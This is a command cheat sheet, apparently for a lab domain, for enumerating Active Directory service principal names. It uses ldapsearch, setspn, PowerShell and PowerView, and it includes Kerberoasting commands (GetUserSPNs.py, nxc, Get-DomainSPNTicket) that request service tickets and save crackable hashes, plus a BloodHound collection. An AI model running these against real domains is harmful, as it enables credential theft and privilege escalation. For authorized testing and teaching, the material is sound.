SPN enumeration tells us which services exist and which account owns each service key. That ownership is the important part. A ticket for an SPN is encrypted with the owner account's key, so every Kerberoast, Silver Ticket, and delegation decision starts with SPN ownership.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export USER=student
export PASS='student'
export BASE='DC=ootw,DC=local'
All SPN-bearing users
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=*))' sAMAccountName servicePrincipalName memberOf userAccountControl msDS-SupportedEncryptionTypes
All SPN-bearing computers
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306369)(servicePrincipalName=*))' sAMAccountName dNSHostName servicePrincipalName userAccountControl
All SPNs
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=*)' sAMAccountName dNSHostName servicePrincipalName distinguishedName
Find specific service class
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=MSSQLSvc/*)' sAMAccountName servicePrincipalName
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=HTTP/*)' sAMAccountName servicePrincipalName
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=cifs/*)' sAMAccountName servicePrincipalName
Kerberoastable users
GetUserSPNs.py "$DOMAIN/$USER:$PASS" -dc-ip $DC
nxc ldap $DC -u "$USER" -p "$PASS" --kerberoast kerberoast.hashes
Request one SPN
GetUserSPNs.py "$DOMAIN/$USER:$PASS" -dc-ip $DC -request-user svc_sql -outputfile svc_sql.hash
Windows setspn
setspn -Q */*
setspn -Q MSSQLSvc/*
setspn -Q HTTP/*
setspn -Q cifs/*
setspn -L OOTW\svc_sql
setspn -X
PowerShell
Get-ADUser -LDAPFilter '(servicePrincipalName=*)' -Properties servicePrincipalName,msDS-SupportedEncryptionTypes |
Select-Object SamAccountName,ServicePrincipalName,msDS-SupportedEncryptionTypes
Get-ADComputer -LDAPFilter '(servicePrincipalName=*)' -Properties dNSHostName,servicePrincipalName |
Select-Object SamAccountName,dNSHostName,ServicePrincipalName
PowerView
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-DomainComputer -Properties samaccountname,dnshostname,serviceprincipalname | Where-Object {$_.serviceprincipalname}
Get-DomainSPNTicket -SPN 'MSSQLSvc/sql01.ootw.local:1433' -OutputFormat Hashcat
BloodHound collection
bloodhound-python -u "$USER" -p "$PASS" -d "$DOMAIN" -ns "$DC" -c DCOnly,SPN,ACL,Session -zip
Record
SPN string
Owner account
Owner type: user, computer, gMSA
Service class
Host portion
Port or instance if present
Encryption types
Delegation attributes
ACL write paths to the owner account